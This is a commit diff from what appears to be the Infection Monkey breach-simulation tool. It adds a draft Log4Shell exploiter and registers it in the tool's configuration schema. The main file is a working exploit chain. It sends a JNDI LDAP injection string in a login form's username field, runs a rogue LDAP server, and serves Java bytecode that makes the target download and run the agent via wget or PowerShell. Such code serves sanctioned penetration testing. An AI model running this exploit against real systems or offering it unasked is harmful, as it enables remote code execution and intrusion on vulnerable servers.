TEMP: base implementation of the log4shell

2021-12-22 17:17:02 +02:00 · 2021-12-22 17:17:02 +02:00 · 41b97cb54a
parent fddaa16931
commit 41b97cb54a
3 changed files with 108 additions and 0 deletions
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@ -0,0 +1,98 @@
+import http.client
+import http.server
+import logging
+
+import requests
+
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit.log4shell_utils import LDAPExploitServer, build_exploit_bytecode
+from infection_monkey.exploit.tools.http_tools import HTTPTools
+from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, VictimHost
+from infection_monkey.network.tools import get_interface_to_target
+from infection_monkey.utils.monkey_dir import get_monkey_dir_path
+
+logger = logging.getLogger(__name__)
+
+LDAP_PAYLOAD = "${jndi:ldap://192.168.56.1:8080/dn=LinuxExploit}"
+
+
+class Log4jExploiter(WebRCE):
+    _TARGET_OS_TYPE = ["linux", "windows"]
+    EXPLOIT_TYPE = ExploitType.VULNERABILITY
+    _EXPLOITED_SERVICE = "Log4j"
+    LDAP_PORT = 8080
+    CLASS_HTTP_SERVER_PORT = 1337
+    URLS = ["http://192.168.56.101:8080/login"]
+
+    def __init__(self, host: VictimHost):
+        super().__init__(host)
+        self._client = None
+        self._stop_http = True
+
+    def exploit_host(self):
+
+        paths = self.get_monkey_paths()
+        # Create server for http download and wait for it's startup.
+        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
+        if not http_path:
+            logger.debug("Exploiter failed, http transfer creation failed.")
+            return False
+        logger.info("Started http server on %s", http_path)
+
+        commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
+        command = self.get_command(paths["dest_path"], http_path, commands)
+
+        java_class = self.build_java_class(command)
+        class_http_server_ip = get_interface_to_target(self.host.ip_addr)
+        self.start_java_class_http_server(class_http_server_ip, java_class)
+        ldap = LDAPExploitServer(
+            ldap_server_port=8080,
+            http_server_ip=class_http_server_ip,
+            http_server_port=self.CLASS_HTTP_SERVER_PORT,
+            storage_dir=get_monkey_dir_path(),
+        )
+        ldap.run()
+
+        payload = {"username": LDAP_PAYLOAD, "password": "m0nk3y"}
+        try:
+            requests.post(Log4jExploiter.URLS[0], data=payload, timeout=5)
+        except requests.ReadTimeout:
+            logger.error("Couldn't send request to the vulnerable machine")
+            return False
+        finally:
+            self._stop_http = True
+            ldap.stop()
+        return True
+
+    def build_java_class(self, exploit_command: str) -> bytes:
+        return build_exploit_bytecode(exploit_command)
+
+    def upload_monkey(self, url, commands=None):
+        pass
+
+    def exploit(self, url, command):
+        pass
+
+    class HTTPHandler(http.server.BaseHTTPRequestHandler):
+
+        java_class: bytes
+
+        def do_GET(self):
+            self.send_response(200)
+            self.send_header("Content-type", "application/octet-stream")
+            self.end_headers()
+            logger.info("Sending payload class!")
+            self.wfile.write(self.java_class)
+
+    def start_java_class_http_server(self, ip: str, java_class: bytes):
+        # TODO run this on a separate thread
+        self._stop_http = False
+        Log4jExploiter.HTTPHandler.java_class = java_class
+
+        server = http.server.HTTPServer(
+            (ip, Log4jExploiter.CLASS_HTTP_SERVER_PORT), Log4jExploiter.HTTPHandler
+        )
+
+        while not self._stop_http:
+            server.handle_request()
--- a/monkey/monkey_island/cc/services/config_schema/basic.py
+++ b/monkey/monkey_island/cc/services/config_schema/basic.py
@ -17,6 +17,7 @@ BASIC = {
                        "SmbExploiter",
                        "WmiExploiter",
                        "SSHExploiter",
+                        "Log4ShellExploiter",
                        "ShellShockExploiter",
                        "SambaCryExploiter",
                        "ElasticGroovyExploiter",
--- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
@ -42,6 +42,15 @@ EXPLOITER_CLASSES = {
            "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
            "/exploiters/mssql/",
        },
+        # TODO finish description
+        {
+            "type": "string",
+            "enum": ["Log4ShellExploiter"],
+            "title": "Log4Shell Exploiter",
+            "safe": True,
+            "info": "TODO: provide full info.",
+            "link": "TODO: link to docs",
+        },
        {
            "type": "string",
            "enum": ["Ms08_067_Exploiter"],